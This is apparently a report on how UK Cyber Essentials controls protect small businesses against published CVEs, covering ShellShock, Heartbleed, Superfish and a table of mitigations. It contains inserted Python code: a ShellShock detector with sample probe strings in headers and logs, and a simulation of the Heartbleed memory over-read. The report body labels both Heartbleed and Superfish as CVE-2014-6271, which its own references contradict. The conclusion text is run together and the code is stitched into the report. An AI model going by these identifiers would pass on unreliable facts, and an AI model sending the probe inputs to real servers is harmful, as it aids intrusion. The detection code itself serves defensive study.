Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4105
Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4114
Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability."

CVE-2014-4127
Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4130
Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4132 and CVE-2014-4138.

CVE-2014-4132
Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4130 and CVE-2014-4138.

CVE-2014-4133
Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4137.

CVE-2014-4141
Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4481
Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.

CVE-2014-4617
The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.

CVE-2014-4631
RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.

CVE-2014-5528
The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2014-6040
GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of "0xffff" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.

CVE-2014-6105
IBM Security Identity Manager 6.x before 6.0.0.3 IF14 allows remote attackers to conduct clickjacking attacks via unspecified vectors.

CVE-2014-6136
IBM Security AppScan Standard 8.x and 9.x before 9.0.1.1 FP1 supports unencrypted sessions, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-6164
IBM WebSphere Application Server 8.0.x before 8.0.0.10 and 8.5.x before 8.5.5.4 allows remote attackers to spoof OpenID and OpenID Connect cookies and consequently obtain sensitive information via a crafted URL.

CVE-2014-6363
vbscript.dll in Microsoft VBScript 5.6 through 5.8, as used with Internet Explorer 6 through 11 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "VBScript Memory Corruption Vulnerability."

CVE-2014-6369
Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-6378
Juniper Junos 11.4 before R12-S4, 12.1X44 before D35, 12.1X45 before D30, 12.1X46 before D25, 12.1X47 before D10, 12.2 before R9, 12.2X50 before D70, 12.3 before R7, 13.1 before R4 before S3, 13.1X49 before D55, 13.1X50 before D30, 13.2 before R5, 13.2X50 before D20, 13.2X51 before D26 and D30, 13.2X52 before D15, 13.3 before R3, and 14.1 before R1 allows remote attackers to cause a denial of service (router protocol daemon crash) via a crafted RSVP PATH message.

CVE-2014-6487
Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.

CVE-2014-7250
The TCP stack in 4.3BSD Net/2, as used in FreeBSD 5.4, NetBSD possibly 2.0, and OpenBSD possibly 3.6, does not properly implement the session timer, which allows remote attackers to cause a denial of service (resource consumption) via crafted packets.

CVE-2014-7927
The SimplifiedLowering::DoLoadBuffer function in compiler/simplified-lowering.cc in Google V8, as used in Google Chrome before 40.0.2214.91, does not properly choose an integer data type, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.

CVE-2014-7945
OpenJPEG before r2908, as used in PDFium in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted PDF document, related to j2k.c, jp2.c, and t2.c.

CVE-2014-8447
Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-8445, CVE-2014-8446, CVE-2014-8456, CVE-2014-8458, CVE-2014-8459, CVE-2014-8461, and CVE-2014-9158.

CVE-2014-8638
The navigator.sendBeacon implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 omits the CORS Origin header, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site.

CVE-2014-8835
The xpc_data_get_bytes function in libxpc in Apple OS X before 10.10.2 does not verify that a dictionary's Attributes key has the xpc_data data type, which allows attackers to execute arbitrary code by providing a crafted dictionary to sysmond, related to an "XPC type confusion" issue.

CVE-2014-9159
Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-8457 and CVE-2014-8460.

CVE-2014-9163
Stack-based buffer overflow in Adobe Flash Player before 13.0.0.259 and 14.x and 15.x before 15.0.0.246 on Windows and OS X and before 11.2.202.425 on Linux allows attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in December 2014.

CVE-2014-9350
TP-Link TL-WR740N 4 with firmware 3.17.0 Build 140520, 3.16.6 Build 130529, and 3.16.4 Build 130205 allows remote attackers to cause a denial of service (httpd crash) via vectors involving a "new" value in the isNew parameter to PingIframeRpm.htm.

CVE-2014-9357
Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction.


Survey Responses


Figure 13 Adaptable Survey-Response Network

Typicality of Case-Study SMEs

Within the survey respondents' network, aspects of each of the interviewed SME networks are apparent.

The Finance SME network shares a local file server, as sensitive information needs to be kept and processed by the organisation. Any SME handling sensitive information is likely to strongly consider using local file servers.

The Specialist SME shares with the survey respondents' data its use of SSH to connect remotely to services. SSH is an important tool for accessing sensitive data while at home, or data that is stored remotely from the workplace.

The Web Development SME requires employees to connect to many web servers remotely; the survey respondents match this case with the use of external web-hosting services. That being said, in the general case this server is more likely to be the SME's own web-hosting solution rather than a client's.

The Hotel Services SME represents a very basic local network, using only cloud-based services remotely. This is becoming an increasingly popular trend for SMEs, as cloud services are often easier to set up and cheaper to maintain. This is also representative of many SMEs with little-to-no online presence.

Analysis of Cyber Essentials on High Profile Vulnerabilities

The following sections detail three of the high-profile vulnerabilities to hit the popular media in late 2014 to early 2015.

These are of particular note as, while they may not be the most damaging of attack vectors (although some are very serious), they have caught the attention of the public, and SMEs would be under pressure to ensure that they were protected.

With this in mind, we analyse how effective the Cyber Essentials security controls are at tackling these high-profile vulnerabilities.

"ShellShock"

Also known by the name "BashDoor", Shellshock hit the news as it attacked the Linux server environment, and did so in a particularly effective manner.

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock". NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

CVE-2014-6271 [13]

The exploit allowed attackers to directly execute arbitrary shell commands on a compromised system by altering environment variables. However, the bug was not enough by itself to actually enable attackers to compromise a system, but allowed access via other services. While the exploit is only effective if the bash environment can be altered, the results can be devastating, as it lays bare the entire system to many other forms of attack.

The threat was particularly insidious for SMEs who used Linux/Unix based servers for services (mail servers, as an example), as they would potentially have no idea that they had been compromised.
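The detection side of the environment-variable vector described above, as an added Python example that is not part of the report: it flags untrusted values (such as request headers that mod_cgi exports into Bash's environment as HTTP_* variables) carrying the "() {" function-definition prefix that a vulnerable Bash would parse. The header set, log lines and regular expression are constructed for this example.

```python
import re

# Bash only treats an environment value as an exported function when it starts with
# "() {"; attackers varied the whitespace, so the pattern tolerates any amount of it.
# Anchoring at the start of the value keeps JSON or JavaScript fragments from matching.
SHELLSHOCK_PREFIX = re.compile(r"^\s*\(\s*\)\s*\{")


def is_shellshock_candidate(value: str) -> bool:
    """True if an untrusted value would be parsed by a vulnerable Bash as a function
    definition (the precondition for CVE-2014-6271 and its follow-up CVE-2014-7169)."""
    return SHELLSHOCK_PREFIX.search(value) is not None


def scan_request_headers(headers: dict) -> list:
    """Return the names of request headers whose values look like ShellShock probes.
    Under CGI every header becomes an HTTP_<NAME> environment variable, which is the
    path through which mod_cgi/mod_cgid exposed Bash."""
    return [name for name, value in headers.items() if is_shellshock_candidate(value)]


def scan_log_lines(lines) -> list:
    """Apply the check to the quoted User-Agent field of access-log lines (combined
    log format); returns 1-based numbers of the lines that should be alerted on."""
    flagged = []
    for number, line in enumerate(lines, 1):
        fields = line.split('"')
        # Combined log format: request is fields[1], referer fields[3], user-agent fields[5].
        if len(fields) > 5 and is_shellshock_candidate(fields[5]):
            flagged.append(number)
    return flagged


# Constructed sample input: one ordinary request and two probe variants.
SAMPLE_HEADERS = {
    "Host": "www.example.com",
    "User-Agent": "() { :; }; echo shellshock-test",
    "Accept": "*/*",
}

SAMPLE_LOG = [
    '203.0.113.5 - - [25/Sep/2014:10:00:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.9 - - [25/Sep/2014:10:00:07 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :; }; echo shellshock-test"',
    '203.0.113.9 - - [25/Sep/2014:10:00:09 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "(){ :;}; echo shellshock-test"',
    '198.51.100.7 - - [25/Sep/2014:10:01:00 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "curl/7.37.0"',
]

if __name__ == "__main__":
    print("flagged headers:", scan_request_headers(SAMPLE_HEADERS))
    print("flagged log lines:", scan_log_lines(SAMPLE_LOG))
```

A match only tells you that a probe arrived; whether it succeeded still depends on the Bash version behind the CGI handler, which is the patch-management question the report goes on to discuss.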

"Heartbleed"

Appearing in April 2014, the CVE-2014-6271 (aka "Heartbleed") bug allowed attackers to directly read the active memory of a target machine through a buffer over-read. This then allowed attackers to access private credentials (or indeed anything else) in the RAM of the target.

As described in the original CVE report:

The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

CVE-2014-6271 [12]

As OpenSSL is a core part of many applications and services, both in the open and closed source world, this vulnerability had the potential to damage a huge number of systems. At the time of release, various sources (including, for example, Netcraft [15]) reported that up to 17% of trusted SSL-certified servers were vulnerable to the attack.
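The buffer over-read described above, as an added Python model that is neither the report's nor OpenSSL's code: it contrasts a heartbeat handler that trusts the declared payload length with one that applies the bounds check introduced in 1.0.1g, run over a constructed heartbeat record and a constructed stand-in for the process memory adjacent to it.

```python
import struct

HB_REQUEST = 1
HB_RESPONSE = 2
MIN_PADDING = 16  # RFC 6520 requires at least 16 bytes of padding after the payload


def parse_heartbeat(record: bytes):
    """Split a heartbeat message into (type, declared payload length, bytes after the header).
    Wire layout: type (1 byte) | payload_length (2 bytes, big-endian) | payload | padding."""
    hb_type, payload_len = struct.unpack("!BH", record[:3])
    return hb_type, payload_len, record[3:]


def vulnerable_response(record: bytes, adjacent_heap: bytes) -> bytes:
    """Model of the pre-1.0.1g handler: the declared length is trusted and that many bytes
    are copied from the payload pointer, so the reply runs past the record into whatever
    follows it in memory. adjacent_heap is a constructed stand-in for that memory."""
    _, payload_len, rest = parse_heartbeat(record)
    readable = rest + adjacent_heap
    return (bytes([HB_RESPONSE]) + struct.pack("!H", payload_len)
            + readable[:payload_len] + bytes(MIN_PADDING))


def fixed_response(record: bytes):
    """Model of the 1.0.1g fix: the message is silently discarded unless the declared
    payload plus the mandatory padding fits inside the bytes actually received."""
    if len(record) < 1 + 2 + MIN_PADDING:
        return None
    _, payload_len, rest = parse_heartbeat(record)
    if 1 + 2 + payload_len + MIN_PADDING > len(record):
        return None
    return (bytes([HB_RESPONSE]) + struct.pack("!H", payload_len)
            + rest[:payload_len] + bytes(MIN_PADDING))


def build_heartbeat(declared_len: int, payload: bytes) -> bytes:
    """Build a heartbeat request whose declared length may disagree with the real payload."""
    return bytes([HB_REQUEST]) + struct.pack("!H", declared_len) + payload + bytes(MIN_PADDING)


def leaked_bytes(record: bytes, adjacent_heap: bytes) -> bytes:
    """Bytes in the vulnerable reply that were never part of the received record."""
    reply = vulnerable_response(record, adjacent_heap)
    _, payload_len, rest = parse_heartbeat(record)
    body = reply[3:3 + payload_len]
    return body[len(rest):]


# Constructed inputs: a well-formed request, one that over-declares its payload length,
# and a fake neighbouring heap region holding something a defender would not want read.
BENIGN = build_heartbeat(4, b"ping")
MALICIOUS = build_heartbeat(64, b"hi")
FAKE_HEAP = b"x" * 10 + b"SECRET-PRIVATE-KEY" + b"y" * 10

if __name__ == "__main__":
    print("vulnerable handler leaks:", leaked_bytes(MALICIOUS, FAKE_HEAP))
    print("fixed handler reply to over-declared record:", fixed_response(MALICIOUS))
    print("fixed handler reply to well-formed record:", fixed_response(BENIGN))
```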

Depending on how the SME in question operates, the threat this particular CVE posed (and indeed still poses, with as-yet-to-be-updated servers still online with the vulnerability) is difficult to discern. Obviously the vulnerability is serious, but the ability of individual SMEs to detect and correct this flaw will vary greatly depending on the individual deployments.

Larger companies with their own Linux/Unix servers may have been able to deploy the patched OpenSSL version as soon as the patch was available, but smaller businesses, or those with more cloud-based services, may not have access to the software running on the servers they use, and may be at the mercy of the respective operators to implement the fix. Because of this, patch management only partially remedies this vulnerability, and other protection methods from the Cyber Essentials guidelines, such as securing configurations or controlling access, will have unknown effects.

It is vulnerabilities such as this that pose the greatest threat to SME networks, as the methods to fix the issue are often outside the control of the company, potentially leaving them vulnerable far longer than one would expect.

"Superfish"

The SDK for Komodia Redirector with SSL Digestor, as used in Lavasoft Ad-Aware Web Companion 1.1.885.1766 and Ad-Aware AdBlocker (alpha) 1.3.69.1, Qustodio for Windows, Atom Security, Inc. StaffCop 5.8, and other products, uses the same X.509 certificate private key for a root CA certificate across different customers' installations, which makes it easier for man-in-the-middle attackers to spoof SSL servers by leveraging knowledge of this key, as originally reported for Superfish VisualDiscovery on certain Lenovo Notebook laptop products.

CVE-2014-6271 [14]

This vulnerability is particularly interesting as the software causing the issue was effectively brokered by a trusted hardware vendor, namely Lenovo. Because the issue was part of the 'normal configuration' for the equipment, it remained undetected for a long time, and hints that there may be further breaches in security as yet undiscovered in both Lenovo's and other manufacturers' equipment.

The vector is through the SuperFish software essentially breaking the chain of trust for SSL certificates by installing a self-signing certificate into the list of trusted certificates on the host machine. This allows an attacker to simply sign their own code via the same certificate, which itself can be easily gathered from any other machine running SuperFish, and they have full access to any SSL-secured connection from the target machine.

Thankfully, while the risks to users and SMEs were high, the fix is a simple one-time run of a removal tool provided by Lenovo themselves [11], and it is mitigated fully through the Cyber Essentials patch management advice.

Threat Analysis

ShellShock: Without Cyber Essentials in place, SME 1 and 2 would be at risk from 'Shellshock', as they both operate Unix/Linux based systems that would require patching to plug the security issue. The extent to which SMEs 3 and 4 are vulnerable to this issue is unclear, as their large dependency on outside service providers leaves them in a position where they are both unable to determine their vulnerability and additionally unable to remedy it.

With Cyber Essentials, SME 1 and 2 would be fully protected, and it is likely that SME 3 and 4 are also protected if the external providers also use Cyber Essentials or other security and patching schemes.

Heartbleed: The 'Heartbleed' bug is another vulnerability that, without Cyber Essentials guidelines being followed, would have laid companies' external-facing services open to malicious attackers.

In all cases, however, each SME can be fully protected with a combination of patch management, firewalling, and application of access controls from the Cyber Essentials guidelines.

SuperFish: All of the SMEs we interviewed could be exceedingly vulnerable to the 'Superfish' issue without Cyber Essentials, as much of their operations revolve around SSL-encrypted communications. A break in the chain of trust for their certificates would allow an attacker to man-in-the-middle their communications.

Normal system updates would have failed to remedy the situation, as the fix provided by Lenovo consisted of a tool to be run in addition to the normal operating system patches. It is further debatable how effective Cyber Essentials patch management would have been in plugging this vulnerability, as it would require that the administrators be aware of the issue and know of the patch, rather than simply following 'normal' patching guidelines. Assuming that the persons responsible for the equipment are aware of the issue, however, then Cyber Essentials patch management fully mitigates this issue.

CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 11 of 28

ConclusionsT

he Cyber Essentials Security Tools havebeen shown to mitigate or to mitigateas soon as a patch is released all

vulnerabilities from remote attackers that donot exploit fundamentally insecure software orhardware Of the two-hundred vulnerabilitiescollected eight exploits were not able tobe resolved with the deployment of securitypatches for vulnerabilities such as these theonly mitigation available is simply not to installthe compromised systems To help preventdeployments being susceptible to attacks onfaulty systems it may be recommended that ablacklist of such items is composed for publicreference

Scope It is important to consider that thescope of this study covers only internet-basedcommodity-level attacks and although theCyber Essentials tools performs very well inmitigating this it does not represent fullsecurity There is an increasingly identifiedrisk from insiders that also requires attentionnot least malicious acts but also from usersunknowingly compromising security

The SMEs interviewed represent organisations from a range of market sectors: web development and online presence, specialist scientific services, the hospitality industry and finance.

Additional Tools

The 10 Steps to Cyber Security [2] identifies additional security measures that complement the Cyber Essentials Scheme well, delivering additional security through indirect measures such as User Education and Awareness, along with Network and Systems Monitoring. These additional measures would serve to bolster cyber security by equipping each employee of the SME with the necessary knowledge of safe practice, its importance and some basic technical understanding, just as they may be versed in environmental awareness. Network and Systems Monitoring allows remote user logins, as well as file access and activity, to be logged. For very small networks this may currently be infeasible, as the extra manpower or finances required for such a system are costly. However, for larger organisations additional monitoring capability should be explored as a future extension to Cyber Essentials, not just to identify and mitigate malicious action from more bespoke and sophisticated attacks than those reported on, but also to aid in providing evidence for any potential cyber-crime investigations.

There exist some collective approaches to improving cyber-security; a notable example is the Cyber-security Information Sharing Partnership (CiSP) [4]. The partnership aims to benefit all members by providing real-time updates on issues of cyber-security and discovered vulnerabilities, as well as best-practice guides and other cyber-threat information. It would be beneficial for more organisations to belong to cyber-security collectives like this, creating networks of informed individuals working together to tackle cyber-crime. This would be particularly useful to quickly identify potential vulnerabilities and possible patches, which, as shown in this report, is critical for the CE patch management security control to fully mitigate related vulnerabilities.

An important note to be made is toward the security of business affiliates and service providers. Even if an SME has Cyber Essentials in place, any use of cloud services relies on the vendor’s security controls for threat mitigation. In other words, cloud email, accounting and any other cloud-based or remote services are only as secure as the service provider makes them. In general, cloud providers should be holding their security practice to a high level of scrutiny and should be encouraged to certify their protection. Hewlett-Packard (HP) has taken this further and has begun to strengthen its entire supply chain ( 600 SMEs) with the Cyber Essentials accreditation. This provides protection across the entirety of Hewlett-Packard’s operations as well as its affiliates. This should be a goal for organisations of all sizes, minimising the risk from cyber-threats by ensuring all trading partners uphold the same high levels of security.

Cyber Essentials Controls

Of the five current Cyber Essentials Controls, Patch Management was considered to aid in the mitigation of the highest proportion of remote attacks (87.5%); counter-intuitively, the survey responses had patch management ranked last in use among SMEs. The most widely used controls could be seen as those providing the most intuitive or easily understood protection: data loss prevention, strong passwords and firewalls. Patch management, by contrast, isn’t necessarily understood by individuals as a tool that can greatly improve cyber-security.

Anti-Malware was useful in mitigating the fewest vulnerabilities (10%). It is, however, important to note that Anti-Malware is largely the only security tool that may routinely scan the network, hardware and software, as well as any items downloaded from the internet or received as email attachments. This serves as a last line of defence and as such is vital to an organisation’s cyber-safety.

Recommendations

To further improve cyber-security across the UK, we recommend that:

1. Collective approaches to cyber security should be further encouraged. In particular, a governmental or collective approach to identifying inherently flawed products should be developed. This could be in addition to, or as an extension of, current initiatives like CiSP, which can make a difference in detecting and reacting to potential vulnerabilities in a timely manner.

2. Further research into the mitigation of other cyber-threats is carried out, to explore the risk from insider threats and targeted attacks.

3. Further employee education is strongly encouraged, especially to be able to tackle the other types of attack mentioned above, which were not within the scope of this report.


References

[1] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, Department for Business, Innovation and Skills. Cyber security guidance for business. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[2] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, Department for Business, Innovation & Skills. 10 steps to cyber security. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[3] CESG, UK Trade & Investment, Prime Minister’s Office, 10 Downing Street, Centre for the Protection of National Infrastructure, Government Communications Headquarters, Department for Business, Innovation and Skills. Cyber security boost for UK firms. https://www.gov.uk/government/news/cyber-security-boost-for-uk-firms, January 2015.

[4] Centre for the Protection of National Infrastructure, CiSP, CERT-UK, Department for Business, Innovation & Skills. Cyber-security information sharing partnership (CiSP). https://www.cert.gov.uk/cisp/, March 2013.

[5] CREST. Cyber essentials certified companies. http://www.cyberessentials.org/list, March 2015.

[6] CVE.Mitre.org. Terminology. http://cve.mitre.org/about/terminology.html.

[7] Cyber Essentials. Cyber essentials scheme: overview. https://www.gov.uk/government/publications/cyber-essentials-scheme-overview.

[8] CESG, Cabinet Office, Centre for the Protection of National Infrastructure, Department for Business, Innovation & Skills. Common cyber attacks: reducing the impact. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400106/Common_Cyber_Attacks-Reducing_The_Impact.pdf, January 2015.

[9] UK Cyber Security Forum. North west cyber security cluster. http://www.ukcybersecurityforum.com/index.php/cyber-security-clusters/north-west-‘-cluster, 2015.

[10] HM Government. Cyber essentials certified companies. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400914/bis-15-72-cyber-essentials-scheme-assurance-framework.pdf, January 2015.

[11] Lenovo. Superfish uninstall instructions. http://support.lenovo.com/us/en/product_security/superfish_uninstall.

[12] Mitre.org. CVE-2014-0160 aka Heartbleed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160, 2014.

[13] Mitre.org. CVE-2014-6271 aka Shellshock. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271, 2014.

[14] Mitre.org. CVE-2015-2077 aka Superfish. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2077, 2015.

[15] Netcraft. Half a million widely trusted websites vulnerable to Heartbleed bug. http://news.netcraft.com/archives/2014/04/08/half-a-million-widely-trusted-websites-vulnerable-to-heartbleed-bug.html, April 2014.

[16] Cabinet Office. The UK cyber security strategy: protecting and promoting the UK in a digital world. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/60961/uk-cyber-security-strategy-final.pdf, November 2011.

[17] Cabinet Office and The Rt Hon Francis Maude MP. Government mandates new cyber security standard for suppliers. https://www.gov.uk/government/news/government-mandates-new-cyber-security-standard-for-suppliers, September 2014.


| CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE | Cyber Controls Applicability |
|---|---|---|---|---|---|---|---|---|
| CVE-2013-0008 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration (User Policy), Anti-Malware |
| CVE-2013-0022 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-0084 | y | y | y | n | y | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-0140 | y | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-0149 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management |
| CVE-2013-0172 | y | n | n | n | n | Not Mitigated | Mitigated | User Access (Strong Password), Patch Management |
| CVE-2013-0174 | n | n | n | n | n | Not Mitigated | Mitigated | Access Policy (Strong Password), Firewall, Patch Management |
| CVE-2013-0199 | y | n | n | n | n | Not Mitigated | Mitigated | Patch Management & Secure Configuration |
| CVE-2013-0253 | n | n | y | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Server) |
| CVE-2013-0270 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-0481 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-0598 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-0619 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-0633 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration (Secure Browsing), Firmware Management |
| CVE-2013-0649 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration (Secure Browsing), Patch Management |
| CVE-2013-0746 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-0753 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-0787 | y | y | y | y | n | Not Mitigated | Mitigated | Patch Management |
| CVE-2013-0909 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-1035 | y | y | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-1102 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management |
| CVE-2013-1140 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration (Don’t install) |
| CVE-2013-1144 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management & Firewall |
| CVE-2013-1153 | y | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration |
| CVE-2013-1181 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management |
| CVE-2013-1303 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-1384 | y | y | y | y | n | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration (Secure Browser) |
| CVE-2013-1388 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration |
| CVE-2013-1450 | y | n | y | y | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management |
| CVE-2013-1472 | y | y | y | y | n | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration (Access Policy) |
| CVE-2013-1553 | y | n | y | y | n | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-1620 | y | y | y | y | n | Not Mitigated | Partially Mitigated | Patch Management & Firewall |
| CVE-2013-1627 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-1638 | y | y | y | y | n | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-1669 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-1676 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-1700 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management, Anti-Malware |
| CVE-2013-1734 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-1777 | n | n | y | n | n | Not Mitigated | Mitigated | Firewall, Patch Management |
| CVE-2013-2319 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Firewall, Secure Configuration (Secure Browser) |
| CVE-2013-2340 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration (Don’t install) |
| CVE-2013-2350 | n | y | n | n | y | Not Mitigated | Partially Mitigated | Patch Management & Firewall |
| CVE-2013-2492 | y | n | y | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management |
